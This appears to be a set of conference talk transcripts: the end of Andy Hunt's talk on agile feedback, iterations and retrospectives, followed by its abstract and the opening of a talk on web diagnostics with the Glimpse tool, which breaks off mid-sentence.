of there. No chance whatsoever. If you're shooting at cities, dynamite. And this is waterfall. This is waterfall process. If your target is big and slow moving, plus your heart, that'll work. Go for it. Dynamite. Unfortunately, most of our targets are a little more nimble these days and that's not the approach that's going to work. So, we've always liked the analogy of tracer rounds, tracer bullets. And the idea with tracers is you take a belt of ammunition and replace every so often with a phosphor tip and you get these streaks of light through the sky where your ordnance is landing in real time under real conditions. So, I don't care how fast the wind is blowing or if gravity is more or less here than it was somewhere else or what my distance to target is or what not, I can see where it's landing. I can adjust in real time even if the target's moving because I've got real time feedback. I can adjust even if the target is moving. That's what you want in an agile project. So, one of the things that we've long suggested is the very first thing you do, the first iteration, is try to get a thin thread of execution from one end of the project to the other. From your iPhone or your web client or whatever through middleware, through this stack, through the database, through whatever else you got plugged in, have everything plugged together even if it's just as simple as hello world, have that level of sophistication, which isn't much, but you have it from end to end fully. Now you know all the parts talk to each other. That alone can save you millions. Believe me, I was there. So were you, probably. To be able to do that, to be able to work this way, you need to be constantly pushing out software that works. You need to be able to deploy, you need to be able to, not saying you that you will, but you need to be able to deploy a full release at a moment's notice. Every day, any day, multiple times a day. Doesn't matter whether you're printing out these lovely coasters to set your drink on or if you're pushing out to mobile devices or just into the cloud, whatever, the whole goal is to get working software out continuously all the time, however you do it. Why? Because you need that for feedback. You know, they used to be saying you can't steer if you're not moving. So you got to at least have some velocity going. So I talk about feedback a lot, that's lovely. How do you get real time feedback? Well, some of it's pretty simple. You know, we like to talk about code a lot and certainly getting feedback from unit tests or test driven development, pair programming. These are all ways of getting real time feedback with code, and that's pretty well worn territory. That's pretty obvious, right? But then maybe some less obvious things. How do you get feedback on a design? Try it. Implement it. See how it works. This is one of the, I think, biggest problems in our industry. You know, we need a design, we need an architecture. Okay, bang. Here's the first thing that comes off the top of my head. I'm going to do that. And I write it. And there you go. One shot. That was it. Richard Gabriel, who was chief scientist or some exalted title at Sun for a good while before Sun went out. He had this marvelous talk where he described the various differences between getting a PhD in computer science from Stanford, respected place, versus getting a lowly master's degree in poetry. And the level of effort, the difference between it was astonishing. I mean, it made the computer science degree look like a walk in the park. It was nothing. You wrote like a program or two. You read a couple books. You were done. There was nothing to it. The poetry degree, however, that was real work. He had to write a poem a day for something like three years. He had to write a single poem 60, 60, 60 different times, 60 different ways. Can you imagine how great we would be as programmers if for every program you wrote, you even wrote it five different ways? Hell, three. Three would do. Right? Something. It's like, well, I don't know the best way to do this. Let me try a couple. I'll prototype it. Write it in Python or Ruby or something fast. Don't prototype in C++, whatever you do. That's a bad idea. But try it. Prototype it. This is how you get feedback from designs. You have to try it in the real world. See what it's going to do. Learn from it. How do you get feedback from requirements? That's an easy one. Again, well-traveled territory. You have the people who are going to be using it involved as closely as you can, as tightly as you can. Sometimes it's not possible. All right? That happens. The result's not going to be as good. It's just that simple. Yet there's no magic to it. And where possible, you want the real actual users involved, not a proxy. You know, there was a case some years back where they built this whole manufacturing system with this login and everything and didn't realize that the user population was illiterate. They couldn't use it. Because their representatives were like, oh, this is great. We're going to do this. We're going to do that. But they weren't the actual users on the factory floor. They deployed it and, oops, a bit of a problem here. They had to go back and redo the whole UI. Teamwork. How do you get feedback from the team? Two ways, really. You've got the stand-up meeting, a scrum practice where you get everyone together and say what you're doing. That's a wonderful way to get feedback from what's going on. And retrospectives. Not postmortems. What's the problem with a postmortem? The patient's dead. So something like end of an iteration retrospectives. I'll talk more about that in a minute. So one of the big things is this idea of continuous development, not episodic. You don't want a big episode of everything. You're saying you've got a big episode of testing coming up. Sounds like some kind of medical condition. You don't want to go there. You want a little bit of everything all the time. Never a big lump in the system. So because of that, because of that, there we go, you get this kind of sense of cycles and rhythms. You've got your check-in and your local build going fairly constantly, an iteration of a couple of weeks. And don't kid yourselves. An iteration of more than four weeks is not agile. Full stop. It's just not. You're kidding yourself. Less than a week, bless your heart. That'd be hard. I wouldn't want to do that. So a couple of weeks-ish. And at the end of each iteration, you want to demo and exercise the code. You don't necessarily foist it onto the user population. Some folks make that mistake. They're like, oh, I can't possibly adopt agile because we can't roll it out to the users every month or every couple of weeks. Okay, don't. But you want to be in the position where you could if you had to. And then every couple months, every year, whatever, you do the full release out to the user population. Not a problem. So I've been talking very generally here, and I'll keep doing that because it's not about whether you're doing XP practices or scrum or crystal or anything else. That doesn't really matter. But the things that you probably do want to do is work on this thin thread model that starts off end to end, hello world, nothing more than that. And then you keep growing onto it. You keep accreting and growing sections and adding features and functionality, making it thicker and thicker up to the end of an iteration. If you're falling behind, if something's going to make it, do you change the date? I find that not helpful. You never ever want to change the date. You want to keep that sense of rhythm going so you keep the date fixed, but you slip the features into the next iteration. That tends to work out pretty well. You want automated builds. I want to be able to build the code exactly the same as Fred does, exactly the same as the server does. That needs to be all automated and consistent. You need eyes on the code. Doesn't matter whether you use pair programming, whether you do code reviews, I don't care what you do, but somehow you need another pair of eyes on every piece of code before it gets checked in. You just do one way or another. Backlogs is helpful to have different people do the prioritization and the estimation. Usually better if you've got the actual team doing the work to do the estimates. Tends to work out better a lot of the time. And you need retrospectives. There's a trick there. A lot of the stuff is like, okay, somebody needs to look at the code. All right, that's fine. There's a bunch of ways you can work that out and you get some benefits. Some will get you more benefit than others, but it's kind of okay. But retrospectives are a little tricky. If you do them the wrong way, you get no value out of it. And the wrong way is everyone gets together after the iteration and it's like, hey, gang, how did it go? Great. Okay, next. Let me move on. There's a bit of an art to extracting good information from a team on how things are going. And I would highly recommend getting a book on the subject, getting a coach or a mentor or consultant something and working with that. We happen to publish a book on the subject. I'll admit it's a really good one. But there's others out there, too. But they go through with kind of consultant tricks with dot votes and index cards and almost party games. But these kind of things to extract from the team what really is going on. Because otherwise, it's like if you were a polling organization and you were trying to do a research on alcoholism, say, you can't just knock on everyone's door and say, oh, good morning. Are you a drunk? That's not going to work out well. First of all, if you did that at university, you'd get false positives. Oh, yeah, all the time. It's just you're not going to get realistic results that way. So you have to be a little more clever about it. And underneath all that, you just need a solid technological base. It goes without saying you need version control and tests and automation. I'll say it anyway. But you have that kind of base and then you do this business on top of it. So, all right, straightforward so far. So the key to this is to seek in all cases, whether it's coding, a meeting, whatever, feedback, and then apply it to change anything that needs changing. This is not just about the code. It's the design. It's the architecture. It's the code. It's the product. It's the process. It's the people. It's the management. It's those pesky users. I mean, they're really the heart of the problem, right? Yeah. But whatever it is, if it's causing a problem, that's something you need to address. It doesn't stop at the code. So that's kind of where we were going from. Where were we coming from? What sort of things fueled this idea of the agile movement? Well, a lot of it, and I think some parts that we've forgotten, come from actual real science, chaos theory in particular, and also ideas from Kaizen, systems thinking, as I talked about earlier, risk management. I just want to take a quick look at some of these. So one of the ideas that was very popular back at the turn of the century, that sounds horrible, that I think has gotten kind of lost is this idea of functioning at the edge of chaos, you know, living where your seat is tipped back just about where it's going to go. D. Hock, who founded Visa International, wrote quite a bit on this, and Jim Highsmith was popularizing this for many years. But the idea that you need enough order, just enough order in your code, your organization, whatever, to generate patterns. And I'll see what he means in just a second. Ed Katmell, who's president of Pixar, you might have heard of them, mildly successful company, he notes that fundamentally successful companies are unstable. Well, that doesn't sound like what we've been doing, does it? We want instability, we want chaos? Goodness gracious, we had enough chaos to start with. How does that work? Well, it's a particular kind. So let me show you this simulation here. This is the Boyd's simulation. It simulates a flock of birds in flight, and it's really interesting and pretty. You see them, you see that it's like particle animation. You see the swarm separate around an obstacle, reform the other side. They do all these graceful patterns. It's very lovely. The interesting thing is, there is no code that specifies any of that behavior. The only thing the code says is these three simple rules, separation, alignment, and cohesion. Those three rules are implemented in the simulation, nothing else. The rest of it is emergent behavior. It just happens as a result of the system. And that is magic. That's the kind of magic that we've always wanted to see. We want to be able to see complex behavior emerge from simple interactions. This is why all the agility stuff says you want simple interfaces, simple team interrelationships, simple this, simple that, so that you get complex behavior out of it. The reverse is true. If you have very complicated interactions and complicated rules, like say any country's taxing authority, you get very stupid behavior out the other side. We'd like to avoid that. So, okay, blah, blah, blah, great. Does this really, does anything like this actually work in practice? Yes, in fact does. Last summer, summer 2012, I had the pleasure of visiting a company in the U.S. that will show remain nameless. They had about 100 or so software developers on staff and no managers. A very small executive team, sort of just enough folks to sign the checks, deal with things that executives need to deal with, but very small, no managers. They don't take attendance. There's no work assignments. It's not saying you're going to work on project A and you're going to work on project B and you're going to work on project C. Instead, when you start up a project, people will come to you and say, hey, that looks interesting. I want to work on that. In fact, that's how it works. You have to have two people minimum to start up a project. So, if it's a really turkey idea and no one else wants to work on it, that gets orphaned pretty early. No one's there. So, you start on it, you get some people going, hey, this is gaining traction, a lot more folks are interested. If it's more interesting than what they're working on, maybe you get some defectors going, maybe it grows. Maybe it's not that interesting. And the one person you talked into it says, you know, this sounded more fun on the brochure. I'm out of here. And it dies. One of the only firm rules they have is you got to release stuff. You can't sit there and say, okay, we're doing a six-week architecture spike. No, you're not. That doesn't cut it. You have to release working product early and often so it can be evaluated. This company's value, if you look at a graph, it's like this. The profits, the revenue, their growth, boom, just like that. And I thought, okay, well, that's a wonderful poster boy. So, I found out they're not the only one. There's maybe a half dozen other entities, mostly smaller, but doing very similar things and getting the same sort of results. How can that work? It's because they're looking at simplicity not as a goal, but as a tool. Simplicity is a generative tool. And that's what we want to see. From code all the way up through organization, we want to see simple interactions, simple rules that generate rich, complex behavior. That's something we've kind of forgotten about. We've been a little bit better with the ideas from Japanese kaizen, the idea of doing continuous changes based on continuous feedback. We're a little better at that except for two things. We don't always keep track of when things are changing. And when we do, we don't always do anything about it. But other than that, we're pretty good on it. One of the problems is we tend to apply these ideas only to code. And we don't look at the other things that we might be doing in a project as well. So that's something we'd like to see expanded, perhaps. How do you reduce risk? Well, the first primary thing, of course, is take small bites. I've said it a dozen times. I'll say it a dozen more. Nothing should be a high ceremony, one time, big event. It should all be small events all the time. Time box, everything. So what do we mean by time box? Well, you've got the iteration. Okay, that's a time box. What even small stuff? You know, a meeting comes up. How long is the meeting? Well, until we figure this out. No, it's an hour. After an hour, whatever the best solution is on the table, that's what we're going with. That's a time box. When you're stuck on a bug, how long are you allowed to sit there and be stuck on a bug? That could be a time box. You could set a team-wide rule that says, all right, if I'm working on this, and I'm stuck for more than an hour, I have to go get help. I am in trouble if I don't go get help at this point. That's an interesting way of looking at time box. Again, doing anything you can to stop something from spiraling out of control and losing control. Now it becomes a big deal. I've been stuck on this for three weeks and I can't fix it. Now we have a problem. If you had looked at this after the first hour, you know what happens when you're stuck on a bug. You call your friend over, they look, they're like, what the hell is that? You're like, oh, and you fix it and life goes on. So there's a lot of things that you can time box that isn't just the iteration. Transparency. We want a general awareness of what everyone's working on because software is so invisible, so intangible. We need to work extra hard at transparency. And you can do things like having information radiators and have a wiki and have the stand-up meeting and whatnot. And that's great. But the best thing, honestly, is to have working software out there all the time. So you can see what's going on. Other people can see what new toys do I have to play with? What's cool? What's new? What's fixed? What's in there that didn't used to be? You need to do the real retrospectives. As I mentioned, you'll get a book, get some help on it, all for the purpose of eliminating any place where bugs can hide. If you're stuck on a problem, bugs can hide there. If you don't know what Fred's working on, bugs can hide there. If you haven't released product in two weeks, six weeks, bugs are hiding and breeding in there. This is what we want to try to eliminate. And of course, what's the best way to write absolutely provable bug-free software? Don't write it. The line of code that you don't write is guaranteed to be bug-free. So if you want fewer bugs, write less code. And interestingly, as sarcastic as that sounds, and it is a bit, the language that you use has a big impact on that. If you get familiar with something like a closure or an ear-lying or elixir or something like that, you can write tons and tons of thousands of lines of code in 25, 100, something much smaller. If you're writing in C++, it goes the other way. Or whatever. I mean, pick a language you want to beat on, but the tool really needs to fit the job. If you're writing systems driver software, C or C++ is probably what you want to do. If you're writing something else, maybe you want to use this WebStack. Maybe you want to use this other language. If you're doing data analysis, maybe you just need to use R. You wouldn't use any of that stuff. It all depends. You want the right tool for the job. So along those lines, come on, you can do it. Maybe you can't do it. All right. There we go. What are some unagile warning signs? I don't know if you can read the cartoon back there, but the dinosaur says, oh, crap, was that today? They missed the boat. We don't want to miss the boat on agility. What do we do? Dan North, who spoke here at this conference. I'm not sure if he's still around, but he had a couple of talks here. He was out consulting for a company a couple of weeks ago. I gathered it wasn't going very well, because he started tweeting some complaints about this group he was working with and how they weren't necessarily grasping this whole agile thing the way maybe they should have. So on the first, the first tweet comes out and Dan tweets and says, all right, agile manifesto line one, people and interactions over processes and tools. And on the first day, the agile team said, which process and tools shall we use? Face palm. Yeah, wrong, wrong, wrong, wrong, wrong, wrong. That's not the first question you ask. What should be the first question you ask? How will we work together? Right? It's about people. How will we work together? When is it okay for me to interrupt you? When is it okay for you to interrupt me? What is what are our protocols of how we're going to work together? What is our percentage of time on site or off? Can we work remote? Are we not going to do that? Are we going to all work in the bullpen? Are we going to do this? Are we going to do that? How long can we be stuck on a bug without help? All those kinds of questions. That's how we work together. That's people and interactions. God, would you look at that? There it is playing his day. And we don't do that. Have you ever even had that conversation on a team? Yes? Do you consider it that way and do you discuss that at your organization? Good for you. I'm genuinely thrilled. Has anyone else even had that conversation as part of their process? One, two, three, four, five. Okay. Dynamite. But what happens is people tend not to think of it that way. I mean, I agree. In a sense, those kinds of protocols are part of the process. But they're the part of the process that relate directly to the people and the interactions rather than the processes and tools. And that's the point. And that actually brings up an important side point, I think, about the manifesto in general. The fact that it has a left side and a right side. And the idea is that when push comes to shove, we prefer the first things over the second things. It doesn't mean you don't use the second thing. It doesn't mean that you ignore it. It just means that it's less important than the other thing. It's a difference of shifting focus, which brings up the next one quite handily. Working software over comprehensive documentation. This has caused a lot of confusion, I think, in the last decade or so. I've had people come to me and say, oh, look, see, it says right there, agile programmers don't do documentation. It does. I'm sorry. I know I'm getting old and I can't see without my glasses. But would you show me where it says that? That's not what it says. First of all, I would have reworded this completely. I would have said working software over really anything else. That's the ultimate goal because that's the hardest part. But even then, on the second day, this team said, oh, which automated spec framework should we use? Again, unfortunately, focusing on the tool rather than necessarily focusing on, OK, well, how are we going to do the first thing and release? Which is probably a better orientation for a first question. This is a fine question. Yes, at some point you do need to decide what tools you're going to use and what automated spec framework you're going to use. But maybe that's not the first thing you should consider. Day three, customer collaboration over contract negotiation. And the agile team says, how much shall we commit to in this sprint? That just tastes a little funny, doesn't it? I don't see a whole lot of, I mean, it's Twitter. OK, so you got to allow for the fact this is 140 characters and you're losing some nuance and some character here. But I'm not seeing a lot of collaboration there. I'm just not seeing it. And then finally, this is my favorite one, adapting to change over following a plan. And they say, let's build a 200 story backlog and follow it. No, no, that's a plan and not a very good one at that. Which leads us to a couple conclusions, first of all being that my remote is just dead now. All right, fine. Agile cannot fix stupid. And it wasn't ever intended to. And that's an actual thing. Don't hold chainsaw by the wrong end. OK, not more than once, certainly. It was never designed to fix stupid. Again, going back to context, the whole agile thing was designed for taking talented, skilled programmers and put them in the most frictionless environment you can come up with to get something out the door. That's what it's designed for. But notice it says you need fairly talented people to do this. Yes, you do. You need them to do anything, really, of consequence. Capers Jones, who writes and researches on this a lot, came up with the first edition of his software assessments and best practices. God help us. Back in 2000, big thick doorstop of a book. It's two and a half, three inches thick, maybe, back when they used paper, you know, for books. And he goes through and he studied something like, I'm going to say, 9,000 projects across 600 or 700 companies. Big department of defense, you know, build a battleship kind of projects down to one guy in his garage stamping out games. You know, wide swath of different things that fall under what we call software development. And he came up with, OK, you know, this stuff seemed to help this stuff, didn't all these best practices and sorted. But right in the very preface, he says, you know what, none of that really matters. He says, even without excellent personnel, even a good to an excellent process will only achieve marginal results. And he actually quantified this with some graphs. He said, if you've got better than average staff, you get something like a 40-odd percent boost in productivity. But you get like a 90 percent hit if they're below average. So you actually get, take a worst hit from unskilled staff than you get as a boost from skilled staff. And the effect is magnified with a manager. If you've got an unskilled manager, unskilled at management, that drags the team down close to 100 percent. Just food for thought there. Which is a problem, of course, because, as I mentioned in my second talk today, we tend to think of ourselves pretty highly. We think of ourselves as being logical and rational, you know, from hanging around computers so much. But actually, of course, the model of our thinking and rationality is closer to the gibbering monkey. Now I can tell who was at the earlier talk because they ain't laughing again. They saw it the first time. And so, you know, I went through a whole bunch of cognitive biases. There's 90 common ones that people suffer from. But one or two in particular really affect agile adoption. And one of them is this need for closure. Dilbert tells us, I didn't have any accurate numbers, so I just made up this one. Studies have shown that accurate numbers aren't any more useful than the ones you made up. How many studies showed that? 87. And this is killer. And this happens all the time because, you know, somebody somewhere in the chain of command says, I need to know how much this project is going to cost and when it's going to be done. And you give the agile response and say, well, we don't know yet. We're working on it. We've got the velocity to blah, blah, blah, blah, blah. No, you don't understand. I've got a form to fill out and I need to put that number in it. I need the number. Oh, fine, 87. Okay. There it goes. This is a huge and horrible pressure because what happens on a team, on a project is, you know, when do you know the least about any software project, right? The day it starts. Hey, guys, we're going to build this thing. All right. I know nothing. I don't even know the name of it yet, right? This is T0. I got nothing. When do you know the most about a project, right? Once it's delivered, once the payment clears, you know, once everyone's been paid right at the very end. So, trick question, when do you want to make all your decisions? Right? And yet everyone is because of this pressure, this need for closure. Many folks, not just accountants and managers, although a lot of them suffer from this, but we do too. A lot of folks want to make the decisions up here because it's just gnawing at them that this isn't known. You have to have that closure. And of course, that's the worst time to make decisions. We want to defer every decision as long as possible. All right? What database are we going to use? I don't know. Plug it in later. Make a facade, make an interface for it. We'll figure it out later. Doesn't matter. Plug and chug. What are we going to do for this? I don't know. Make an interface for it. Plug and chug later, right? Overall, it's a better architecture, but you want to defer your decisions as long as possible. And a lot of folks are really acutely uncomfortable with that. So what can we do to get better at agile? Well, one of the problems is most people at most tasks never get beyond what we call the advanced beginner level on the Dreyfus model. You learn just enough to kind of get by and then you're stuck. You don't really grow beyond that. And the problem is down at this level, you have to function. You have to be given rules in order to function. The higher levels you have to use intuition. Down here, you've got to go by the rules. The problem there is they've shown that rules in this context reduce the team down to a novice level. So any of these like strict methodologies that say or strict process that says you have to do this and you have to do that and you have to do that, you're losing the nuances of context. You're losing the value of expertise and you're reducing the entire team to the novice level of experience. And in fact, good old Ed Katmul back at Pixar says, and I quote, I don't like hard rules at all. I think they are all bullshit. I trust Ed. He seems to be doing pretty well for himself these days. And again, you know, it's not about the rules. It's not about the practices. It's about, it's not even well how well you do them. It's about this agile mindset. It's about getting feedback, making adjustments and collaborating. Now, to be able to do that, you have to have this kind of must list here. You've got to have all of your development and management practices generate continuous, meaningful feedback, whether it's coding a meeting, acceptance testing, rolling out to users, everything you do, you've got to say, what's the feedback we're going to get from that? And how are we going to analyze that? If you don't know how to get that, don't do the activity yet. You're not ready. You need to be able to evaluate the feedback in context. This is one of the problems I have with things like like TSP and PSP where they're very metric heavy and you're going to measure every little thing I do. Again, you're going to reward what you're measuring. That may or may not be what you really want to do. You're losing context. You need to be able to change whatever needs changing. Your code, your team, your interface, the rest of the organization to respond to it. If you can't do these things, I would suggest trying an agile approach. Do some agile practices. You'll get some value out of it, but you ain't going to be agile. And then when all else fails, and this happens, you know, after every one of these kinds of things, people say, okay, I've got this situation. How do I handle this in an agile manner? That's how. Look at what you're doing and say, all right, am I focused on the process, small p, and the tools? Or am I thinking about the individuals in their interactions, that component of the process and the tooling? Or am I focused on process for processes sake, or the tool because it's a new toy? Am I focused on getting something that works out the door and into the hands of somebody who can give me feedback? If what I'm doing does not directly support that, maybe I should think twice about doing it. Am I working with the customer? Or do I have some lawyers involved negotiating contracts? That rarely works out well. Am I responding to change? Or am I setting a plan and trying to follow it? All right, if you stick to the things on the left-hand side, you can answer those questions for yourself. And that is actually the real key thing that we've been kind of missing. So two aspects to that. First of all, how do you get agility? All right, you think of these things that I just talked about, that kind of environment, the definition, manifesto values, that thrusts you towards agility. But then there's two things you got to do. First of all, you need to make mistakes. Ed says, if everyone's trying to prevent error, that screws things up. I've seen that more than a few times, yeah. The actual cycle you want to do looks more like this. Try something, do it. Fail at it. Oh yes, the F word, fail. Learn from it. Oh, that's why no one does it that way. Okay, good. I know that now. And repeat, failure is required. If you haven't tried an approach to a piece of code that has totally fallen on its face and burned up in flames, if you haven't done that three times in a given day, you're not thinking hard enough. You're just doing the first thing that comes to your mind. You need to expand more. You need to fail. You need to write stuff that breaks. It goes, oh, that turned out to be a real turkey of an idea. All right, I know better now. I'm going to try something different this time. Try fail, learn, repeat. That's close. That'll get you going. We're almost there. Now there's one big thing that's missing. The biggest single element that's been missing from, you like Nessie? Yeah, the biggest element that's been missing for the last 10, 13 years. When you do improv on stage, theater improv, what happens is you've got actors out there and there's no script. They don't know how it's going to play out. They don't know how it's going to end. Is it going to be a comedy or a tragedy? What's the topic? They don't know. This sounds a lot like a software project, really. You're out there without a script and you don't know how it's going to end. So for improv to work, you've got to agree to a couple rules up front. Otherwise, it's just going to be boring and it's not going to work. And the two rules are to agree and add. So I come out. I'm the first actor and I say, wow, here we are on the moon. And you come out as a second actor and go, yep. Okay. What? I got nothing. It just died in its sleep right there. Nothing happened. Or worse, you could say, okay, here we are on the moon. And you come out and say, no, we're not. Again, I'm stuck. I got nothing. So what you have to do is you have to agree with the premise as it's been presented so far. And then add something to it. Yes, here we are on the moon. And I think I just saw something move behind that rock. Okay, now we can go somewhere with it. Yes, you're right. I saw that. And I think, whatever, you add your thing. He adds his thing and off you go. And now you've got an improv performance underway. They call this the broken remote. They call this the yes and method. You agree. And then you add your piece. This is what we have been missing for the past decade. No one has added their pieces. When we did the original meeting back in 2001, there were interviews afterwards from various news outlets. And one of the sort of common questions was, what do you see happening 10, 15 years from now? Which is ironic because we're there now. So it gives you a nice chance to look back. And I can't say everyone thought this, but certainly it was a popular thought at the time that one of the things we would see as an outgrowth of the Agile Manifesto was an explosion of Agile methods. You know, everyone and their dog and their consultant and their consultant dog would come out with their own unique branded Agile method. They would adhere to the manifesto, but they add their own practices and their own unique twists on it and their own things. And that never happened. We've got extreme programming. We've got Scrum. We got a little bit of stuff from Lean thrown in the mix. There was a new practice to XP. They added planning poker. I mean, two hands. There's not a whole lot going on there. And this is what we've been missing. Folks have not necessarily been adding in their practices, their thoughts. If you're adapting to the change that's around you, that's part of it. We need to do this differently. You know, this pairing thing isn't working. This backlog idea isn't working. This other thing, in our context, in our situation, this is not working for us. All right, try something that might. And again, it's okay to fail at it the first couple of times. Well, we tried this. That didn't work either. Okay, try again. You notice on the very first slide, I think this should be the logo for the Agile movement. It was a crumpled piece of paper. We tried that idea. Didn't work. Next, let's try that. Next, we got a big thick pad. We can try a lot of ideas. We need to try more of that, I think. So, in conclusion, I love this quote that says, the real voyage of discovery is not in seeking new landscapes, but in having new eyes. And I hope over the last hour I've given you some new eyes to consider agility and software development. I am Andy Hunt. That is my Twitter handle. That is my email address. There's some books that I've written. Thank you so much for having me. In theory, we have time for questions. If you want to go get snacks, food, whatever the next round is, that's fine too. Any questions? Snacks it is. All right. Thank you all.
|
It’s been over ten years since we coined the term agile. Are you finally comfortable with being agile? If you are comfortable, then that’s too bad, because it means you’re doing it wrong. Join Andy Hunt, one of the 17 authors of the Agile Manifesto for an important look back at what it means to be agile, and how to progress from simply following agile practices to becoming a true self-directed, self-correcting agile practitioner.
|
10.5446/51542 (DOI)
|
Okay, let's get started. So everyone's here, I'm guessing, to talk about web diagnostics. Yes? Yeah, we've got one over there. Okay. I'm guessing everyone else is in the wrong room. You sure you want to be here? You sure? Like, you can still go. I won't mind. But anyway, so we're here to talk about web diagnostics. My name is Anthony Van Der Horne and I'm one of the co-founders of Glimpse. I've been a web developer now for about 12 years, going on 13 years. And as I mentioned just before, I'm currently based in Brisbane, Australia, currently relocating to the United States, as previously mentioned. Also, I happen to have the fortunate position of actually being able to work on open source as my full-time job. And I think that's pretty cool. And all of that is thanks to Redgate. And they've done a pretty good job about it too. Because I think a lot of projects you have, you know, that might be started by a company that's open source, yet Glimpse, which is what we're talking about today, actually started in the wild and a company's come forward, Redgate, and said, we want to sponsor you guys to continue building awesome products. And so I think that's pretty cool. Our objective today is to make you awesome, okay? And we're going to do this by talking about diagnostics for the web. So what is diagnostics? Okay? So today we're going to say that diagnostics is trying to get an insight into your application. So you've got a website or a web service or something like this, and you're trying to gain an understanding of how it's actually operating. Or you actually have a problem, i.e. it's not functioning the way that you expect it to. So you're trying to debug it. Okay? So that's what we mean by diagnostics. But before we go any further, how many people have actually heard of Glimpse before? Okay? So we're doing good. Of those people who have heard of Glimpse, how many people have actually used Glimpse in like development? Okay? Cool, cool, cool. Of those people, we're going to do this one more, I swear, how many people have actually used Glimpse in production? Okay? We've got one, two, maybe three? Not three? No? Okay, so for the guy who's using Glimpse in production, this is yours after the talk, okay? So we're doing good. And lastly, how many people, I told a lie, I said that was going to be the last question, but this is the last question. How many people have actually heard of HUD in the context of Glimpse? Got two people over there, three people down here. Okay? So I think you guys are in for a treat today, if I say so myself. So we're actually going to take a quick glimpse at what we're talking about to gain some context and actually have a look at what is Glimpse. So I've got my Visual Studio project here. Actually, I'm not going to do that. I'm going to go here. And we're just going to go to this website that I spoiled up earlier. And we're going to take a glimpse at what Glimpse is. So we're just waiting for it to load. So essentially, the vision of Glimpse was that we can get into your server, okay? But you just install DLLs and by virtue of that, we can get an understanding of what's going on in the server. We can collect all sorts of bits of information as the request executes. If we could collect all of that information and then present it to you in some way, how would you actually want to consume that information? Okay? So what we actually do is we've got this panel that shows up in the bottom of your website here. And it's all just HTML and divs and everything like this. And we actually get all of that information from the server and display it to you here. Okay? And that's the idea being that we can actually see how your systems configured, how the request was executed, what MBC is doing if using ASP.MBC, all of that. But taking a step back for a second, we are going to get started on diving into diagnostics. So diagnostics is one of the hardest things we do. Does anyone disagree with that? Okay? No? Okay, good. We're on a roll. Debugging is twice as hard as actually writing the code in the first place. Therefore, if you write your code to the maximum of your capability, you should therefore not be capable of actually being able to debug it. Okay? Has anyone ever had that experience where they've just gone, oh my God, what's going on here? Anyone? Yep? Okay, cool, cool. So we all know what we're talking about. This is a problem. Okay? What we're seeing up here. So we're trying to fix it. Also, about 40 to 60 percent of our time is actually spent debugging and diagnosing what's actually going on with our code or our site or whatever else. This is a problem because when we switch from debugging, okay, or switch from being creative into our debugging mode, there's actually a pretty big cognitive switch to that. It's not like we can just go, you know, make that switch, you know, and expect that it's going to, you know, we're going to be able to continue what we're doing. You're actually taking a step back, reevaluating a problem that you might be having, and then at some point later, trying to get back into that creative mode. Again, this is a problem. Also, the fact that the web isn't simple. Okay? What we're dealing with here is a landscape of multiple platforms, multiple languages, tons of different frameworks and environments, and this is only becoming, this landscape is only growing and becoming more interconnected day by day. Okay? And systems logic is becoming so widespread and more loosely coupled that trying to gain an understanding of what's actually going on in your system is getting much harder to deal with. And you'll have to excuse New Zealand being cut off the edge of this slide, you know, me being Australian, you know, it's not like we don't like them or anything. So let's talk about our current approach. What are we doing? Debugging a diagnosis hasn't really changed in the last 20 years. So since development tools came around, we've pretty much always had, you know, breakpoints. We've always pretty much had log files and miscellaneous other tools. But we haven't really seen too much of a revolution in these tools. They're kind of basic the way they work. So if we have a look at breakpoints, this allows you to stop a programmer at a given point in your application and kind of see what's going on, what variables are set to what. We've got log files, which show us the actions that our system has taken, a lot of them usually, depending on how many logs we're putting out. We've got static analysis tools. And these can show us how our systems are actually constructed, which is really good. But at the end of the day, something is missing. Most of these tools are too low level. Also, they're extremely blunt instruments. So let's actually have a look at what this means. If we have a look at Visual Studio, how many people have ever had a problem where they've gone into their code and they've set like 20 different breakpoints trying to capture where exactly a problem hits? Anyone? Yeah, okay. So we all know what we're talking about with breakpoints. And breakpoints are even as bad that we have conditional breakpoints. So we can actually say, only hit this breakpoint if it hits this condition. Visual Studio has got even a full panel dedicated to managing your breakpoints. That smells a bit to me and seems like there's a bit of a problem here. And don't get me wrong. I think breakpoints are great when you want to know the value of a variable or something like this. But again, pretty low level. Also, when it comes to breakpoints, how do we know where to set that breakpoint to capture where the problem is or to replicate it? Again, everyone pretty much put their hand up because it's like, I don't know where the problem is. So you're trying to put it around to be able to capture that. Log files. Again, how many times have people trod through log files trying to figure out what their system was doing? Shelf hands. So again, we all know this problem. And what we're trying to do is filter those logs down to actually try and get a sense of what's actually going on inside of our system. Again, if all you have is a log file, fantastic. But again, to me, it smells. There's a bit of a problem. Also, I think an important realization here is that the runtime is dynamic. And that the fact that the runtime is only getting more complicated and more complex. So if we take a look at, let's say, static analysis tools, they're great at being able to show you, here's how your system is architected. Here's the modules. This one's bigger than that one and whatever else. But reality is, systems are becoming more convention based every day. And actually, this picture that our static analysis tools show us isn't actually representative of what's going on during the runtime. So again, fantastic when you want to see you're new to a project, maybe you're a consultant or whatever else and you want to see how is this project structured, where's some code smells because of different patterns that are being used. But it's not actually going to tell you much about how the system is actually executing. And at the end of the day, context is king. And what I mean by that is what is the context that my request actually ran in? And when you're trying to debug something, how is it actually operating at that particular point in time? This is important stuff. And that's a problem with, let's say, breakpoints. A breakpoint can't, doesn't have any knowledge that you're using MVC. And hence, I'm going to provide you with a different experience because you're using MVC or that you're using MVC in conjunction with any framework. A log file can dump all of that out, but it can't help it make that more useful for you. So all of these sorts of things are problems. So given what we had discussed, there should be a better solution. Why isn't there a better solution? As I mentioned before, debugging hasn't really changed in 20 years. So as it turns out, this is what myself and Nick, also co-founder of Glimpse, was discussing on a subway platform one night in New York. And we were discussing why is the system like this? As it turns out, because Nick's kind of ancient, he used cold fusion back in the day. And he was talking about how in cold fusion they kind of had this dumpout that you could do that was how the system was actually executing and what it was doing and some SQL statements and stuff like that. And that then clicked. Why isn't anyone doing this? Okay? So important questions. So the other question we're asking ourselves was we were both working for the same company at the time and we were both responsible for training customers and educating people running workshops and stuff like this. And so the problem was I could spend a whole day trying to explain to someone how MVC works. Particularly, you know, maybe if you come from other platforms and whatever else, these convention-based systems are quite obvious. But when you've been doing web forms all your life, trying to understand the switch that is MVC is quite a steep learning curve. Okay? So how do we do this? Traditional systems are much more straightforward in how they actually execute. And that static picture is probably much more, is much closer, closely representative of what's actually happening. But these days, with our dynamic systems, they're not. Also, how, and this kind of comes back to the education, how could we generate a picture of the request that's actually happened? How could we show someone what's actually happening? And, you 